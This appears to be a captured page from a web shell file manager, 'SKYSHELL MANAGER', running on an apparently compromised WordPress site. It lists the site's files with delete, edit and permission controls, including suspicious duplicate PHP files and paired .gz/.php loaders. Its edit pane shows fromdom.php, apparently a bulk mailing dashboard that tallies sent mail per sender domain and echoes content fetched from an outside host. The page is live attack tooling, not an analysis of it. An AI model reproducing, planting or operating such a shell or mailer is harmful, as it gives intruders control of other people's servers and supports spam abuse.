📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
surefundeals
/
Name
Size
Perm
Actions
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.51 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
222.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
0.4 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
3.54 KB
0666
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
50.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.gz
21.5 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.php
0.15 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
31.88 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.94 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.gz
47.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.php
0.16 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
yyj.txt
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: fromdom.php
<?php include_once "connect.php"; $key=$_REQUEST['key']; if(empty($key)) {$key=0;} if($key==4) { $temp=explode('.',$local_server); $temp=explode('//',$temp[0]); echo file_get_contents("http://1and1-1.webxmail.us/generate_fromdom_csv.php?key=1&alias=$temp[1]"); exit; } if($key==3 || $key==0) { $temp=explode('.',$local_server); $temp=explode('//',$temp[0]); echo file_get_contents("http://1and1-1.webxmail.us/fromdom.php?alias=$temp[1]"); } if($key==1 || $key==0) { echo " <td width='30%' valign='top'> <div id='snt_ct_res' class='box box-color box-bordered'> <div class='box-title'> <h3> <i class='icon-table'></i> Sent Count by Date/ PID /Domain </h3> <h3 style='float:right;cursor:pointer;font-size:15px;'> <span onclick='generate_csv1(4);' title='Click to generate csv file' >Generate csv</span> <span id='csv_resp_4' style='margin-left:5px;color:white;font-size:15px;'></span> <i class='glyphicon-refresh' onclick='refFun(\"1\",\"snt_ct_res\");'></i> </h3> </div> <div class='box-content nopadding'><table class='table table-hover table-nomargin table-striped'> <thead> <tr> <th >#</th> <th >Date</th> <th >PID </th> <th >From Domain</th> <th >Sent </th> </tr> </thead> <tbody>"; $i=1; $res=mysql_query("SELECT date(s_date),process_id,from_domain,sum(sent) from md_fromdomain group by 1,2,3 order by 2 desc, 4 desc limit 100",$link1); while($row=mysql_fetch_array($res)){ echo "<tr><td>$i</td><td>$row[0]</td><td>$row[1]</td><td>$row[2]</td><td>$row[3]</td></tr>"; $i++; } echo "</table></div></div> </td> "; } if($key==2 || $key==0) { echo " <td width='20%' valign='top'> <div id='snt_ctd_res' class='box box-color box-bordered'> <div class='box-title'> <h3> <i class='icon-table'></i> Sent Count by Domain </h3> <h3 style='float:right;cursor:pointer;font-size:15px;'> <span onclick='generate_csv1(5);' title='Click to generate csv file' >Generate csv</span> <span id='csv_resp_5' style='margin-left:5px;color:white;font-size:15px;'></span> <i class='glyphicon-refresh' onclick='refFun(\"2\",\"snt_ctd_res\");'></i> </h3> </div> <div class='box-content nopadding'> <table class='table table-hover table-nomargin table-striped' > <thead> <tr> <th >#</th> <th >From Domain</th> <th >Sent </th> </tr> </thead> <tbody>"; $i=1; $res=mysql_query("SELECT distinct from_domain, sum(sent) from md_fromdomain group by 1 order by 2 desc limit 100",$link1); while($row=mysql_fetch_array($res)){ echo "<tr> <td>$i</td> <td>$row[0]</td> <td>$row[1]</td> </tr>"; $i++; } echo "</table> </div> </div> </td> "; } ?> <script> var shpath='<?php echo "$local_server/";?>'; function refFun(key,res) { $('#'+res).html("<a class='btn btn-blue btn-mini' href='#' ><i class='icon-refresh icon-spin'></i> Processing... </a>"); $.post( shpath+"/fromdom.php", { key: key }, function(data) { $('#'+res).html(data); } ); } function generate_csv1(flag) { $('#csv_resp_'+flag).html("<a class='btn btn-blue btn-mini' href='#' ><i class='icon-refresh icon-spin'></i></a>"); $.post("list_id.php", { key: 4 ,flag:flag }, function(data) { $('#csv_resp_'+flag).html(data); } ); } function generate_csvFile(alias) { $('#csv_resp_6').html("<a class='btn btn-blue btn-mini' href='#' ><i class='icon-refresh icon-spin'></i></a>"); $.post("fromdom.php", { key: 4 ,alias:alias }, function(data) { $('#csv_resp_6').html(data); } ); } </script>
Save